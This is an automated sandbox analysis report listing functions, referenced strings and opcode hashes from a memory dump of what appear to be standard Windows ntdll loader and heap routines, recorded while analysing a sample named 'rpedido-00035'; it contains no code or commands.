                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                          • API String ID: 0-1676968949
                                                          • Opcode ID: e61a7e1200810eda57b07eb8858140af7f1cecf8740c7bbbf6f21ffae3bc88f3
                                                          • Instruction ID: aa1a94f187349a0595153aa68f79ec89b7cbcfa022b83769f7301deb23a9c3cc
                                                          • Opcode Fuzzy Hash: e61a7e1200810eda57b07eb8858140af7f1cecf8740c7bbbf6f21ffae3bc88f3
                                                          • Instruction Fuzzy Hash: 31511074A01741DBF711CF69C946B0A7FE4AF08754F2006E8F952AB6E1DB71E940CB85
                                                          Function 360BD62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • HEAP: , xrefs: 360BD79F
                                                          • HEAP[%wZ]: , xrefs: 360BD792
                                                          • Heap block at %p modified at %p past requested size of %Ix, xrefs: 360BD7B2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                          • API String ID: 0-3815128232
                                                          • Opcode ID: 00750268703cac94db784427ef8ca52c46764c7c9dbfc7fdc97c0e119fc789eb
                                                          • Instruction ID: c5792d6a5724ad7e641e63a708713d06790d781331fa8b1988dbaa5c74e74d20
                                                          • Opcode Fuzzy Hash: 00750268703cac94db784427ef8ca52c46764c7c9dbfc7fdc97c0e119fc789eb
                                                          • Instruction Fuzzy Hash: 3D5149785403508EFB10CA2AC8427B6FFE1DF45288F50C8D9E4E58B1C0E666D487DB60
                                                          Function 3600753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                          • API String ID: 0-1151232445
                                                          • Opcode ID: 1cb951090007d98bafc82eec13fce8ca476f1c1dedf839c6fe6eab4eb697bb79
                                                          • Instruction ID: bbb883eea57e9337cc364e1c7d9bb71dd8abcc46bd2162572cbf89b99f380ac9
                                                          • Opcode Fuzzy Hash: 1cb951090007d98bafc82eec13fce8ca476f1c1dedf839c6fe6eab4eb697bb79
                                                          • Instruction Fuzzy Hash: 4E411578B007408FFB15DA1BC48A7A97FE0DF0234DF6444E9D8479B952CAA9D886CF61
                                                          Function 360415EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • minkernel\ntdll\ldrtls.c, xrefs: 36081954
                                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36081943
                                                          • LdrpAllocateTls, xrefs: 3608194A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                          • API String ID: 0-4274184382
                                                          • Opcode ID: 5873becee0a73e7eb84aa20fd86bf06180d601a0eaf212a278b6f13e21280323
                                                          • Instruction ID: 4ad26c8ec8c70dfc46e4c55613514df54250da7921464a5543edd6ef3ccbd179
                                                          • Opcode Fuzzy Hash: 5873becee0a73e7eb84aa20fd86bf06180d601a0eaf212a278b6f13e21280323
                                                          • Instruction Fuzzy Hash: 564159B5A00605EFDB15CFAACD42AAEBFF6FF48300F0445A9E505AB250DB35A851CF90
                                                          Function 360432C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RtlCreateActivationContext, xrefs: 36082803
                                                          • Actx , xrefs: 360432CC
                                                          • SXS: %s() passed the empty activation context data, xrefs: 36082808
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                          • API String ID: 0-859632880
                                                          • Opcode ID: d08dcaed244d7055a8273db7e7856e4abfe78fec46b70b4fe7a9e080922efd3a
                                                          • Instruction ID: b3025b1e3e1d5540c486cdd0c6e3e3921caa537fdf9715b7cf0cc9ae52f445cb
                                                          • Opcode Fuzzy Hash: d08dcaed244d7055a8273db7e7856e4abfe78fec46b70b4fe7a9e080922efd3a
                                                          • Instruction Fuzzy Hash: AC311572A01305DFEB16DE26D892B9A7BE4EB44714F5144B9ED049F241CBB1E845CBD0
                                                          Function 3609B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • GlobalFlag, xrefs: 3609B30F
                                                          • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3609B2B2
                                                          • @, xrefs: 3609B2F0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                          • API String ID: 0-4192008846
                                                          • Opcode ID: 163a90806c7b9fb28e172de8d761846215fec77f2fffe119a5b66663d8023fb2
                                                          • Instruction ID: 8e208460677405b52252a9c4b69b93e0679bc897d86ae7627af8172e80e1a94b
                                                          • Opcode Fuzzy Hash: 163a90806c7b9fb28e172de8d761846215fec77f2fffe119a5b66663d8023fb2
                                                          • Instruction Fuzzy Hash: 2D315AB5E00209AFDB10DFA5CD82AEFBFBDEF04354F4044A9E605A7251E7759A04DB90
                                                          Function 36041527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • LdrpInitializeTls, xrefs: 36081851
                                                          • minkernel\ntdll\ldrtls.c, xrefs: 3608185B
                                                          • DLL "%wZ" has TLS information at %p, xrefs: 3608184A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                          • API String ID: 0-931879808
                                                          • Opcode ID: f2508815f1f2aedee17e2427dc52b3dce406b5af4bb93f2a55543b129233878d
                                                          • Instruction ID: eef21650044cf186393530663a1a83658a86b1bb05cc752e9a0f17a9be831498
                                                          • Opcode Fuzzy Hash: f2508815f1f2aedee17e2427dc52b3dce406b5af4bb93f2a55543b129233878d
                                                          • Instruction Fuzzy Hash: 9E31F7B1A10211EBEB21AB46CE46BAA7FBDAB40354F1100E9E605B7180DB70AD55CB90
                                                          Function 360985AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 360985DE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                          • API String ID: 0-702105204
                                                          • Opcode ID: 45cd2f38c85387d5de389119646f961fe7e0cba2b710a3b923aea29913dae57c
                                                          • Instruction ID: d7d45114b46a16bde200324cb2349515fe0ab883aa968cb7a05a548e44a69702
                                                          • Opcode Fuzzy Hash: 45cd2f38c85387d5de389119646f961fe7e0cba2b710a3b923aea29913dae57c
                                                          • Instruction Fuzzy Hash: 0C0170756142009BEA204F62CDC9ACA3FF7EF00394F400CD8E1015B672CF20A895DF95
                                                          Function 36015622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 8810ea475cdf0087d7863f02ecd489a6e2a0447e636bc7a7f7153a214cd13cb1
                                                          • Instruction ID: 79abd8b89d8fd8d36f22c74a42eb3544875fc69c7ee69f41cc9ab77eb5202456
                                                          • Opcode Fuzzy Hash: 8810ea475cdf0087d7863f02ecd489a6e2a0447e636bc7a7f7153a214cd13cb1
                                                          • Instruction Fuzzy Hash: 9531FE78711B16EFE7468B60CE52A8AFFA5BF44758F1001A5E9018BB50EB70E930CBC1
                                                          Function 3608E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Legacy$UEFI
                                                          • API String ID: 0-634100481
                                                          • Opcode ID: 82f19cfd21227b75e26e960022d2a281dc262285a9f4d9a9a01f562485bceacc
                                                          • Instruction ID: 5bf6f4e786f7bbe845f536046d8b26b8b615dda61eec484fa2eb12ea97e6d37b
                                                          • Opcode Fuzzy Hash: 82f19cfd21227b75e26e960022d2a281dc262285a9f4d9a9a01f562485bceacc
                                                          • Instruction Fuzzy Hash: 7E6169B1E043189FEB14CFA9C941BAEBBF8FF44744F5044AAE549EB251EA31D940CB51
                                                          Function 360EB55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RedirectedKey, xrefs: 360EB60E
                                                          • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 360EB5C4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                          • API String ID: 0-1388552009
                                                          • Opcode ID: 280ce2868cb55f72da8fd099532ec72c49caaa8f7af70ef228b6f178099c520c
                                                          • Instruction ID: c31195647f0e3304a4a5d77311339c9d08eea7af6831acb5b9b9dbe77ef73698
                                                          • Opcode Fuzzy Hash: 280ce2868cb55f72da8fd099532ec72c49caaa8f7af70ef228b6f178099c520c
                                                          • Instruction Fuzzy Hash: DD6104B5C12628EFDF11CF95C949ADEBFB8FB08700F5040AAE505A7250DB349A45CFA0
                                                          Function 3602F640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: $$$
                                                          • API String ID: 3446177414-233714265
                                                          • Opcode ID: 5c9f68abfbbff1aea5b1179301ef35db966d7f5f576b1929d522c1c573b71dba
                                                          • Instruction ID: 02ebc3110a2c6947a6abfb51d028abdc2cafc4f7475a26fe3dce2ca96f2130fd
                                                          • Opcode Fuzzy Hash: 5c9f68abfbbff1aea5b1179301ef35db966d7f5f576b1929d522c1c573b71dba
                                                          • Instruction Fuzzy Hash: AF61AD75E407498FEB20CFA4CA86B9DBFF2FF04784F1044A9D515AB690CB74A941CB91
                                                          Function 360433D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3608289F
                                                          • RtlpInitializeAssemblyStorageMap, xrefs: 3608289A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                          • API String ID: 0-2653619699
                                                          • Opcode ID: 694766b38984b587824d31e66ab5613cc7188f057adc9994dd0982ef0290b99c
                                                          • Instruction ID: a2fec4295ec21b8d33fec2d91b13a9853dfc0519315508fb690f985bc0eafe09
                                                          • Opcode Fuzzy Hash: 694766b38984b587824d31e66ab5613cc7188f057adc9994dd0982ef0290b99c
                                                          • Instruction Fuzzy Hash: 16113A72F05214FBFB2A9A5ACD42F9A7EE9DB84744F5080B9B9009B240DA75DD40C6E4
                                                          Function 3604A4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Cleanup Group$Threadpool!
                                                          • API String ID: 0-4008356553
                                                          • Opcode ID: b33996a69f7607fb7ef285283b7a90734e9c408212ed3033fd9fd35203f0d6eb
                                                          • Instruction ID: 8bc95205c904d53b8bed1bcbdd0cb04ae566489b8ca42a5de8e7f05de0390696
                                                          • Opcode Fuzzy Hash: b33996a69f7607fb7ef285283b7a90734e9c408212ed3033fd9fd35203f0d6eb
                                                          • Instruction Fuzzy Hash: 2001F4B2114740AFE322EF14CE06B267BE8EB40715F0189B9E65CD7590EB74D924CF96
                                                          Function 3601C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: MUI
                                                          • API String ID: 0-1339004836
                                                          • Opcode ID: 49b01aeaab85c2eeb3e9ab9944df450f8096c8a22a632436fa356d9f397a8d3f
                                                          • Instruction ID: ddc4b5a6a307d4d5a62e031e0d31a567cf04e93f0c8cc1a2c523eae7d436ca59
                                                          • Opcode Fuzzy Hash: 49b01aeaab85c2eeb3e9ab9944df450f8096c8a22a632436fa356d9f397a8d3f
                                                          • Instruction Fuzzy Hash: 33826DB9E003189FEB15CFA9C98279DBBB1FF49354F5081A9D819AB290DB34DD81CB50
                                                          Function 360164F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 04e53382f6fc97714f330a61a7bd0e0c09bc9213ce254b4ce3fc8bb6c1c816aa
                                                          • Instruction ID: 1d04ac535b3cdc762d5578c5f811811611192a635bd4091a0b037619b2ae8c3c
                                                          • Opcode Fuzzy Hash: 04e53382f6fc97714f330a61a7bd0e0c09bc9213ce254b4ce3fc8bb6c1c816aa
                                                          • Instruction Fuzzy Hash: 59E1AD78A183418FD304CF28C991A1EBFE1FF89348F158AADE48587351DB71E955CB92
                                                          Function 3603E507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 123d767d9b373db50c366498b7463d118389e9370674acf6c7d6b5c045b50b97
                                                          • Instruction ID: 488c37db46916306006b88dc6430c3455fd86ef0ceafbc139f52eaf63aad373d
                                                          • Opcode Fuzzy Hash: 123d767d9b373db50c366498b7463d118389e9370674acf6c7d6b5c045b50b97
                                                          • Instruction Fuzzy Hash: 89A11471E01324AFEB11CBA5C946B9E7FE4AF04798F2102D6EA20AB2D0D7749D44CBD5
                                                          Function 36011051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 02292323f184b1c8e99c47de4f16e57ea3fa63eb70888eec7be4c1b473c1391b
                                                          • Instruction ID: a96890dcdccc9fd536229eae4dcad0b30bb4b3dbdcad71f6ed4ff504c1c760fe
                                                          • Opcode Fuzzy Hash: 02292323f184b1c8e99c47de4f16e57ea3fa63eb70888eec7be4c1b473c1391b
                                                          • Instruction Fuzzy Hash: 19B103B59093818FD354CF29C581A5AFFE2FF88308F5449AEE89987351D771E845CB82
                                                          Function 36017623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fc8fc7d7ac78dee871673419bafb960c32ed3ba7ca758127a046b664d774a60a
                                                          • Instruction ID: 0f4491f740dd7d9ae339048c83d82a3b64de3b8769c2142668dbaeafcda9c0a9
                                                          • Opcode Fuzzy Hash: fc8fc7d7ac78dee871673419bafb960c32ed3ba7ca758127a046b664d774a60a
                                                          • Instruction Fuzzy Hash: BD615079E00606AFEB08CF68C985A9DFFB5FF48344F2481AAD519A7340DB30A9558BD0
                                                          Function 3601254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 9af322529dee9ffaecf9a332ab1a81b048b29bd8baea38da73e8364fcea7fe3e
                                                          • Instruction ID: 2ef22fda4bac3f0c43e0a7513b5e5f7f5cac8d53d0772328d52a9e50fb41c398
                                                          • Opcode Fuzzy Hash: 9af322529dee9ffaecf9a332ab1a81b048b29bd8baea38da73e8364fcea7fe3e
                                                          • Instruction Fuzzy Hash: 1D418E79911704CFD715CF24DA52A49BBF2FF45358F2185DAC1069B2A4DB30AAC1CF85
                                                          Function 36014779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 1fd64bed7c341928e8d3bb883ef013f4537eda70f15fcca25946dfa03cde3c20
                                                          • Instruction ID: 90141c528da38bba7313ccce45ac4c4d4f4ca127c9b980d3dfe6278db0a0ec15
                                                          • Opcode Fuzzy Hash: 1fd64bed7c341928e8d3bb883ef013f4537eda70f15fcca25946dfa03cde3c20
                                                          • Instruction Fuzzy Hash: 6541C178A103818FD715CF29C995B2EBFE6EF81764F1044ADE541872A0DBB0D855CBE1
                                                          Function 3600B420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 703f03a34cfd887182b88692ff0567160182f289deed3d659f85a75487fc3347
                                                          • Instruction ID: fab77f46fd35bae69eb4f83fd9e814931ae3626921e93e4fb824f12138c35ccf
                                                          • Opcode Fuzzy Hash: 703f03a34cfd887182b88692ff0567160182f289deed3d659f85a75487fc3347
                                                          • Instruction Fuzzy Hash: B0310276900208AFE711CF14C881A5A7BB5EF45368F1042E9ED055B291CB32EE42CFD0
                                                          Function 360156E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.44892143167.000000003610D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_35fe0000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 73adc336d40eb18013343c738eaaa2f7ebb5dd676675cee82abf3f6c241b7ff1
                                                          • Instruction ID: ea36b9b310b51c02885e549145827927e377c5f285745b6e3993c31d650c6caf
                                                          • Opcode Fuzzy Hash: 73adc336d40eb18013343c738eaaa2f7ebb5dd676675cee82abf3f6c241b7ff1
                                                          • Instruction Fuzzy Hash: 6C31EF79B21A11FFE7468B60DE92A49BFA5FF84254F509096E8018BB50CB30F870CB81
                                                          Function 360BE750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.44892143167.0000000035FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35FE0000, based on PE: true
                                                          • Associated: 00000002.00000002.44892143167.0000000036109000.00000040.00001000.00020000.00000000.sdmpDownload File
